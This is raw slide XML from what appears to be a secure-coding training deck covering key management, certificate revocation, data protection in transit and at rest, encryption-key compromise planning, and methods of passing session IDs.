              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—How keys are removed from use and how they are destroyed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—How keys are changed on a periodic basis. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key generation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—How keys are generated to ensure they are random.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—What to do when keys have been compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Frequency of key use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—How to limit the time that keys are used and the frequency of key reuse. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key escrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Provides law enforcement and other agencies authorized access to encrypted information. Keys may have to be stored at other locations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Management Factors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198366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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="5755116" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificates revoked when:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They expire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security of private key is in doubt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List issued periodically by CA of certificate serial numbers that have been revoked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides reasons for revocation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRL has digital signature to prevent spoofing or DoS attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List has short lifetime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OCSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses HTTP request to obtain revocation status from CA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides faster confirmation than CRL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Revocation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7041" y="1283897"/>
            <a:ext cx="2857143" cy="21428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7641" y="2055154"/>
            <a:ext cx="918983" cy="918983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1970195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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit and at Rest (Slide 1 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for protec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252453" y="1306948"/>
            <a:ext cx="7621521" cy="4943276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement all cryptographic functions on a trusted system, such as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate random numbers, random file names, random GUIDs, and random strings using your encryption library’s approved random number generator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption libraries that comply with FIPS 140-2 or an equivalent standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that cryptographic modules fail securely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Utilize a single standard TLS implementation that is configured appropriately.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956B328A-0246-45D0-945E-3846DC277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8AEF3C46-5E36-4B48-AC01-E8FBEB393A62}"/>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1115897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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit and at Rest (Slide 2 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for protec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252453" y="1306948"/>
            <a:ext cx="7621521" cy="4943276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use encryption (such as provided by TLS) to protect all sensitive information (such as credentials) sent over the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pre-encrypt files you must transmit over unencrypted channels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When encrypted channels fail, do not fall back to an unsecure connection, unless you encrypt data before sending.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure SSL and TLS certificates are valid and have the correct domain </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name, not expired, and installed with intermediate certificates </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when required.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{956B328A-0246-45D0-945E-3846DC277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43DBE366-C7E5-4613-95F9-3B00909D07E7}"/>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866097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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit and at Rest (Slide 3 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for protec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252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify character encodings for all connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect all sensitive data stored on the server (include caches and temporary copies) from unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove any sensitive data from the system as soon as it is no longer required.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purge temporary working files as soon as they are no longer needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strong encryption algorithms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect server-side source-code from being downloaded by a user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9CCFF5-9A10-423F-A50F-49E460F02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6B7B4B8A-57B3-4408-8379-ECF5B4499D6B}"/>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1801867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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit and at Rest (Slide 4 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for protec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252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not store passwords, connection strings, or other sensitive information in cleartext on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable auto-complete features on forms expected to contain sensitive information, including authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable client-side caching on pages containing sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish and follow a policy and process for managing encryption </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>keys.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9CCFF5-9A10-423F-A50F-49E460F02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4892F4D3-2D8B-4CCD-B5A7-DC5D11C0841D}"/>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2922546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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage Encryption Keys (Slide 1 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect stored keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know where cryptographic keys are stored within the application and what memory devices the keys are stored on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect keys in volatile and persistent memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never store keys in plaintext format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt keys stored in offline devices or databases using Key Encryption Keys (KEKs) prior to the export of the key material. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KEK length and algorithm should be equivalent to or greater in strength than the keys being protected.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12"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a:off x="285458" y="1916800"/>
            <a:ext cx="836776" cy="15383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rotect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checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC735AE-357C-4C77-9D7D-7FE205710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9371A151-84B1-47C3-8F61-8C5A9D063121}"/>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5658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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage Encryption Keys (Slide 2 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide integrity protections to keys in storage (e.g., dual purpose algorithms that support encryption and Message Code Authentication (MAC)). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store all keys in a cryptographic vault, such as a hardware security module (HSM) or isolated cryptographic service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform work such as key access, encryption, decryption, and signing in the vault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that standard application-level code never reads or uses cryptographic keys in any way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use key management libraries.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12"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a:off x="285458" y="1916800"/>
            <a:ext cx="836776" cy="15383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rotect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checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC735AE-357C-4C77-9D7D-7FE205710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21BB5171-6823-4A6A-B736-C18874797039}"/>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2141350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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage Encryption Keys (Slide 3 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252453" y="1302040"/>
            <a:ext cx="7549621" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plan in advance how to handle a key compromise by creating a compromise recovery plan, which should include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The identification and contact info of any personnel:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should be notified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should perform the recovery actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should provide other support for the recovery actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The procedures that should be used for re-keying and recovery, and how personnel should be trained on these procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An inventory of all cryptographic keys and their use (e.g., the location of all certificates in a system).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policies to enforce key revocation (to minimize the effect of a compromise).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How re-keying operations should be monitored to ensure that all required operations are performed for all affected keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any other recovery procedures.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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a:off x="285458" y="1916800"/>
            <a:ext cx="836776" cy="15383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protect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checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{559078FC-6F74-4906-A9AE-0D8A21188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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7C695B-EE7F-4152-8048-29024E7C8910}"/>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105715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376D-5553-4D01-9215-AD9760AAB559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods for Passing Session IDs (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503746AF-0ED3-4279-ACD5-8C95F2DD4F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454718CA-A77B-4BE6-A1C5-F120E31C5539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="1066800"/>
          <a:ext cx="8801784" cy="2810256"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1371600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3429000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4001184">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3235437500"/>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Benefits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Disadvantages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POST request with session ID in hidden form field</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Can be used even if the client web browser has high security settings and has disabled the use of cookies.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Less visible than session ID embedded in URL.</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Requires higher skill level to attack than session ID in URL.</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Enables client to bookmark or share URL without providing access to their session ID.</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Attacks can be carried out using commonly available tools, though not quite as easily as reading session ID from URL.</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Poor coding practices on the server side (failure to check whether the submission type is GET or POST) may allow the POST content to be reformed into a URL that could be submitted via the HTTP GET method.</a:t>
                      </a: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8253521"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831778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cdn.pixabay.com/photo/2016/11/05/08/23/matrix-1799661_960_7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609" r="15609"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="944880"/>
            <a:ext cx="9144000" cy="59131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0117" y="1171812"/>
            <a:ext cx="7643857" cy="5115356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
